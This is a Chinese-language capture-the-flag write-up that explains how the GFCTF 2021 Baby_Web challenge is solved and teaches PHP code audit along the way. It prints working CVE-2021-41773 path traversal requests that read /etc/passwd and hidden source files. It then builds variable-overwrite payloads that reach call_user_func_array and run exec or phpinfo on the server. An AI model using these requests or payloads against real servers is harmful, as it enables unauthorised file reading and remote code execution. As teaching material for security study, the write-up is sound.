[GFCTF 2021]Baby_Web(CVE-2021-41773) 从一道题入门PHP代码审计 （保姆级）

[GFCTF 2021]Baby_Web(CVE-2021-41773)

题目标签：WEB、PHP、CVE-2021-41773、变量覆盖

做后考点总结：CVE+PHP中量代码审计

CVE-2021-41773是一个Apache Httpd Server 路径穿越漏洞

详情见：CVE-2021-41773_Jay 17的博客-CSDN博客

在源码中发现了hint：

直接按CVE-2021-41773的思路用现成payload打一下试试。

先是初始界面刷新抓个包，然后改包。

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

当前目录是/var/www/html/，那么上层目录就是/var/www/。源码提示说：源码藏在上层目录xxx.php.txt里面，猜测xxx应该包括了index。

GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/index.php.txt HTTP/1.1

读到了源码

index.php：

error_reporting(0);
define("main","main");
include "Class.php";
$temp = new Temp($_POST);
$temp->display($_GET['filename']);

?>

include "Class.php";疯狂暗示我们同目录下还有一个Class.php文件。

一开始我是这样读的：

GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/Class.php HTTP/1.1

但是返回404了。

正确的应该是这样读的：

GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/Class.php.txt HTTP/1.1

提示中上层目录xxx.php.txt中的xxx并不是只指向一个index.php.txt，而是指向了两个txt文件，xxx是一个泛指。

Class.php：

defined('main') or die("no!!");
Class Temp{
    private $date=['version'=>'1.0','img'=>'https://www.apache.org/img/asf-estd-1999-logo.jpg'];
    private $template;
    public function __construct($data){

        $this->date = array_merge($this->date,$data);
    }
    public function getTempName($template,$dir){
        if($dir === 'admin'){
            $this->template = str_replace('..','','./template/admin/'.$template);
            if(!is_file($this->template)){
                die("no!!");
            }
        }
        else{
            $this->template = './template/index.html';
        }
    }
    public function display($template,$space=''){

        extract($this->date);
        $this->getTempName($template,$space);
        include($this->template);
    }
    public function listdata($_params){
        $system = [
            'db' => '',
            'app' => '',
            'num' => '',
            'sum' => '',
            'form' => '',
            'page' => '',
            'site' => '',
            'flag' => '',
            'not_flag' => '',
            'show_flag' => '',
            'more' => '',
            'catid' => '',
            'field' => '',
            'order' => '',
            'space' => '',
            'table' => '',
            'table_site' => '',
            'total' => '',
            'join' => '',
            'on' => '',
            'action' => '',
            'return' => '',
            'sbpage' => '',
            'module' => '',
            'urlrule' => '',
            'pagesize' => '',
            'pagefile' => '',
        ];

        $param = $where = [];

        $_params = trim($_params);

        $params = explode(' ', $_params);
        if (in_array($params[0], ['list','function'])) {
            $params[0] = 'action='.$params[0];
        }
        foreach ($params as $t) {
            $var = substr($t, 0, strpos($t, '='));
            $val = substr($t, strpos($t, '=') + 1);
            if (!$var) {
                continue;
            }
            if (isset($system[$var])) { 
                $system[$var] = $val;
            } else {
                $param[$var] = $val; 
            }
        }
        // action
        switch ($system['action']) {

            case 'function':

                if (!isset($param['name'])) {
                    return  'hacker!!';
                } elseif (!function_exists($param['name'])) {
                    return 'hacker!!';
                }

                $force = $param['force'];
                if (!$force) {
                    $p = [];
                    foreach ($param as $var => $t) {
                        if (strpos($var, 'param') === 0) {
                            $n = intval(substr($var, 5));
                            $p[$n] = $t;
                        }
                    }
                    if ($p) {

                        $rt = call_user_func_array($param['name'], $p);
                    } else {
                        $rt = call_user_func($param['name']);
                    }
                    return $rt;
                }else{
                    return null;
                }
            case 'list':
                return json_encode($this->date);
        }
        return null;
    }
}

代码审计：

首先分析index.php

1、实例化了一个Temp类对象，并且向构造方法传参，参数是所有POST提交的变量。

2、调用了Temp类中display方法并且传参，参数是GET方式提交的filename变量。

然后分析Class.php

1、首先是Temp类里的构造方法

private $date=['version'=>'1.0','img'=>'https://www.apache.org/img/asf-estd-1999-logo.jpg'];
private $template;
public function __construct($data){
        $this->date = array_merge($this->date,$data);
    }

其中array_merge()函数的特性如下：（需要注意一下第二点，会造成之后的变量覆盖）

1、合并一个或多个数组.合并后参数2数组的内容附加在参数1之后。同时如果参数1、2数组中有相同的字符串键名
2、则合并后为参数2数组中对应键的值，发生了覆盖。//注意，会造成变量覆盖
3、然而，如果数组包含数字键名，后面的值将不会覆盖原来的值，而是附加到后面。
4、如果只给了一个数组并且该数组是数字索引的，则键名会以连续方式重新索引。

在php手册中对array_merge()函数的样例： （帮助大家理解）

$array1 = array("color" => "red", 2, 4);
$array2 = array("a", "b", "color" => "green", "shape" => "trapezoid", 4);
$result = array_merge($array1, $array2);
print_r($result);
?> 

以上PHP代码执行后会输出

Array
(
    [color] => green
    [0] => 2
    [1] => 4
    [2] => a
    [3] => b
    [shape] => trapezoid
    [4] => 4
)

2、然后分析在index.php中调用的方法display()

 public function display($template,$space=''){
        extract($this->date);
        $this->getTempName($template,$space);
        include($this->template);
}

extract()：从数组中将变量导入到当前的符号表

include()：包含一个文件

3、接着分析display方法中调用的getTempName()方法

    public function getTempName($template,$dir){
        if($dir === 'admin'){
            $this->template = str_replace('..','','./template/admin/'.$template);
            if(!is_file($this->template)){
                die("no!!");
            }
        }
        else{
            $this->template = './template/index.html';
        }
    }

如果传入getTempName()方法的形参$dir值是admin，那就对类中template属性（$this->template）进行拼接，拼接getTempName方法中属性$template，并且进行替换过滤。

is_file()用于检查是否是文件。

到这里，代码就没有再指向下一步了，还剩一个listdata()方法没有审计。

访问一下这个方法中的两个路由试试。

/template/index.html：（无效路由）

/template/admin/：（有效路由）

不难发现，/template/admin/路由调用了listdata()方法。

那么我们肯定需要使display()方法中的include()函数包含/template/admin/路由了！

4、最后，对listdata()方法进行审计：

public function listdata($_params){
        $system = ['db' => '', 'app' => '', 'num' => '', 'sum' => '', 'form' => '', 'page' => '', 'site' => '', 'flag' => '', 'not_flag' => '', 'show_flag' => '', 'more' => '', 'catid' => '', 'field' => '', 'order' => '', 'space' => '', 'table' => '', 'table_site' => '', 'total' => '', 'join' => '', 'on' => '', 'action' => '', 'return' => '', 'sbpage' => '', 'module' => '', 'urlrule' => '', 'pagesize' => '', 'pagefile' => '',];
        $param = $where = [];
        //去除字符串首尾处的空白字符
        $_params = trim($_params);
		//使用一个字符串分割另一个字符串，代码中以空格为分割，将$_params属性分割成一个数组$params[]，比如说原来$_params="zhi shi xue bao"，经过explode函数处理后变为$params=["zhi","shi","xue","bao"]
        $params = explode(' ', $_params);
   		//检查数组中是否存在某个值
        if (in_array($params[0], ['list','function'])) {
            $params[0] = 'action='.$params[0];
        }
    	//遍历给定的 params 数组
        foreach ($params as $t) {
            //substr:返回字符串的子串,第一个参数是“母串”，第二个参数是起始位置，第三个参数是长度。如果没有第三个参数就意味着从起始位置截取到最后。
            //strpos:查找字符串首次出现的位置
            //$var为$t中等号前的所有。
            //$val为$t中等号后的所有。
            $var = substr($t, 0, strpos($t, '='));
            $val = substr($t, strpos($t, '=') + 1);
            //即$t不是“xxx=xxx”形式，而是“xxx”形式
            if (!$var) {
                continue;
            }
            if (isset($system[$var])) {
                $system[$var] = $val;
            } else {
                $param[$var] = $val;
            }
        }
    
        // action
        switch ($system['action']) {
            case 'function'://111
                //$param['name']存在
                if (!isset($param['name'])) {
                    return  'hacker!!';
                //function_exists()：如果给定的函数已经被定义就返回TRUE
                //即$param['name']作为函数已经被定义
                } elseif (!function_exists($param['name'])) {
                    return 'hacker!!';
                }
                $force = $param['force'];
                if (!$force) {
                    $p = [];
                    foreach ($param as $var => $t) {
                        if (strpos($var, 'param') === 0) {
                            //intval:获取变量的整数值
                            $n = intval(substr($var, 5));
                            $p[$n] = $t;
                        }
                    }
                    if ($p) {
                        //call_user_func_array:调用回调函数，并把一个数组参数作为回调函数的参数
                        $rt = call_user_func_array($param['name'], $p);
                    } else {
                        //call_user_func:第一个参数是被调用的回调函数，其余参数是回调函数的参数。
                        $rt = call_user_func($param['name']);
                    }
                    return $rt;
                }else{
                    return null;
                }
            case 'list'://222
                //将$this->date进行json格式的加密，并且输出
                return json_encode($this->date);
        }
        return null;
    }

trim()：去除字符串首尾处的空白字符

explode()：使用一个字符串分割另一个字符串，代码中以空格为分割，将${}_{p}arams属性分割成一个数组$params[]，比如说原来$ _ params=“zhi shi xue bao”，经过explode函数处理后变为$params=[“zhi”,“shi”,“xue”,“bao”]

in_array()：检查数组中是否存在某个值

foreach()：遍历给定的数组

substr()：返回字符串的子串,第一个参数是“母串”，第二个参数是起始位置，第三个参数是长度。如果没有第三个参数就意味着从起始位置截取到最后。

strpos()：查找字符串首次出现的位置

function_exists()：如果给定的函数已经被定义就返回 TRUE

intval()：获取变量的整数值

call_user_func_array()：call_user_func_array:调用回调函数，并把一个数组参数作为回调函数的参数

call_user_func()：第一个参数是被调用的回调函数，其余参数是回调函数的参数。

json_encode()：进行json格式的加密

不难发现，在下面一段代码中，存在RCE的可能

                    if ($p) {
                        //call_user_func_array:调用回调函数，并把一个数组参数作为回调函数的参数
                        $rt = call_user_func_array($param['name'], $p);
                    } else {
                        //call_user_func:第一个参数是被调用的回调函数，其余参数是回调函数的参数。
                        $rt = call_user_func($param['name']);
                    }

方法一：

利用call_user_func_array函数进行RCE

最后的目标应该是$rt=cal{l}_{u}se{r}_{f}un{c}_{a}rray("system",命令);即$param[‘name’]=system且$p=命令

1、先使$param['name']=system,一步一步倒推，在switch语句内，我们需要使$param{[}^{\prime }nam{e}^{\prime }]存在并且是定义函数（已经满足，无需考虑）同时$system[‘action’]=function

2、继续倒推，满足$param['name']=system的话，在foreach语句块中，$params数组需要有以下键值对

‘name’ =‘system’

‘action’ = ‘function’

考虑到满足$p=命令，$params数组还需要有以下键值对

‘force’ =‘false’ //满足$force = $param{[}^{\prime }forc{e}^{\prime }];if(!$force)

‘param0xxxxx’ = ‘命令’

解释一下这个'param0xxxxx' => '命令'。
foreach ($param as $var => $t)语句使得$var='param0xxxxx' 并且$t='命令'。$n是$var第五位开始截取的字符串，在我这个payload中就是0xxxxx，经过intval函数之后$n=0，最后$p[0] = $t;就是$p[0] ='命令';。当然，这里下标也可以不是0，只要是个数字就行。

3、继续推，看到下面这一段代码。如果$params数组（有序数组）第一个元素是'list' 或者'function'，就把$params数组第一个元素的内容，前面加上一个字符串action=。

if (in_array($params[0], ['list','function'])) {
    $params[0] = 'action='.$params[0];
}

所以这里又可以分为两种情况。

一、利用上一段代码

$params=[“function”,“name=system”,“force=false”,“param0xxxxx=命令”]

这里"function"元素必须放在第一位。

二、不利用上一段代码。

$params=[“action=function”,“name=system”,“force=false”,“param0xxxxx=命令”]

这里"action=function"元素位置可以任意。

4、继续往上推，快到头了。

$_params参数的值是"function name=system force=false param0xxxxx=命令
或者action=function name=system force=false param0xxxxx=命令

剧透一下，有一个payload在结合了实际的listdata()方法的调用后是无效的。但是从代码审计的角度看，审计、推理到目前都是正确的。

5、继续推，跳出listdata方法。

如果我们要调用这个listdata方法就需要进入template/admin/这个路由，即在display()方法中包含这个路由，即display()方法中执行include($this->template);时，$this->template属性就是template/admin/

6、继续上推，那么我们就需要在includ的上一句程序$this->getTempName($template,$space);中改变$this->template属性（这个属性初值是''）。

进入getTempName()方法。我们的目的是执行$this->template = str_replace('..','','./template/admin/'.$template);语句，并且在执行时使$dir = 'admin'并且$template=index.html。

因为template/admin/路由和template/admin/index.html文件都能调用listdata方法，但是if(!is_file($this->template))要求必须是文件！

所以getTempName($template,$dir)方法的形参$template=index.html，形参$dir=admin。

7、继续上推，getTempName($template,$dir)方法的形参确定了，而getTempName($template,$dir)方法的形参又来源于display()方法的方法内变量（也可以叫属性）$template和$space。而这两个属性在方法内是不存在的，要使这两个属性存在且有我们需要的值，只能执行extract($this->date);语句，从数组中将变量导入到当前的符号表。

那么类中变量/属性$this->date就应该是['template'=>'index.html','space'=>'admin']，没结束，别急，我更加急。

8、回顾一下listdata方法的传参：

在代码中定义的说传入一个参数，但是这个参数肯定是字符串啦。

在template/admin/index.html文件中调用这个方法时，方法的形参传参是这样的：

确实也是一个字符串，但是细心的师傅肯定能发现，这个字符串可控的只有最后一部分$mod。就是说不管我们怎么改变listdata方法的传参，listdata方法的参数都会带有一个前缀action=list module=。

这导致了两个问题。

一、

在推理的第【4】步有剧透过：有一个payload在结合了实际的listdata()方法的调用后是无效的。

因为传参一定会带有一个前缀，所以我们无法控制$_params字符串分割成的数组$params的第一个元素是"function"。第一个元素只会是action=list。

所以第【4】步$_params参数的值只能是action=function name=system force=false param0xxxxx=命令

那么listdata("action=list module=$mod")调用方法时，$mod=xxxx action=function name=system force=false param0xxxxx=命令。最终结果就如预期那样listdata("action=list module=xxxx action=function name=system force=false param0xxxxx=命令)成功就行RCE。

二、

listdata()方法是在display()方法中被包含并且调用的。

在template/admin/index.html文件中调用listdata()方法时说这样调用的：listdata("action=list module=$mod")

就是说display()方法还需要有个属性$mod=xxxx action=function name=system force=false param0xxxxx=命令

那么第【7】步，类中变量/属性$this->date就应该是['template'=>'index.html','space'=>'admin','mod'=>'xxxx action=function name=system force=false param0xxxxx=命令']

9、（最后）感谢你坚持看到这里，写的有点冗余属实抱歉，我初心只是想写的详细一点，没想到到这里已经这么多了。师傅请勿怪罪qaq~

接下来就是最后一步，构建最终POST/GET传参的payload了。

前面提到：

$this->date=['template'=>'index.html','space'=>'admin','mod'=>'xxxx action=function name=system force=false param0xxxxx=命令']

$template=index.html （第【6】步）

而$this->date是在构造方法__construct($data)中由于array_merge()第二个特性变量覆盖而被赋值的。所以构造方法__construct($data)中$data属性就可以等于$this->date等于['template'=>'index.html','space'=>'admin','mod'=>'xxxx action=function name=system force=false param0xxxxx=命令']即我们在index.php中（题目初始界面）POST一个：

template=index.html&space=admin&mod=xxx action=function name=system param=命令

此时在初始界面GET提交的filename变量（display()方法中的$template变量）就随意了，因为最后都会被POST提交的变量覆盖。

?xxx=xxx                     //GET

这种情况的payload：

?xxx=xxx                     //GET
template=index.html&space=admin&mod=xxx action=function name=system param=命令

当然，$template变量也可以通过在初始界面GET提交的filename变量作为display()方法调用时的参数，此时就得避免被POST提交的变量 变量覆盖

这种情况的payload：

?filename=index.html              //GET
space=admin&mod=xxx action=function name=system param=命令

最后还有一个问题，因为函数禁用、命令执行无回显或只回显一行等原因，我们的payload还需进行绕过处理（本篇主要讲代码审计，RCE绕过过滤的过程就略啦~）

system换成exec

命令需要带出到文件，如果命令中有空格则需要用${IFS}替换空格。

最后payload：

?xxx=xxx                     //GET
template=index.html&space=admin&mod=xxx action=function name=exec param=tac${IFS}/f11111111aaaagggg>/var/www/html/1.txt

或者

?filename=index.html              //GET
space=admin&mod=xxx action=function name=exec param=tac${IFS}/f11111111aaaagggg>/var/www/html/1.txt

方法二：

利用call_user_func函数进行RCE

flag在phpinfo中也会显示。所以我们只需要$param['name']='phpinfo'就行啦。

过程及其类似且少于方法一，就不重复推了。

最后payload就是：

?xxx=xxx                     //GET
template=index.html&space=admin&mod=xxx action=function name=phpinfo

或者

?filename=index.html              //GET
space=admin&mod=xxx action=function name=phpinfo

希望这篇博客能对你有所帮助！